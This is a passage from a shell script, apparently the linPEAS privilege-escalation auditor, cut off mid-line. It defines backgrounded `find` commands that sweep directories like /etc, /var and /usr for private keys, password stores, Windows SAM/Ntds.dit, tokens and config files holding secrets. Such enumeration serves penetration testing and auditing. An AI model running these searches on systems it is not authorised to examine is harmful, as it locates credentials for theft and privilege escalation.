FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"bind\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"kube-proxy\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"bind\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"exports\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"*knockd*\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name 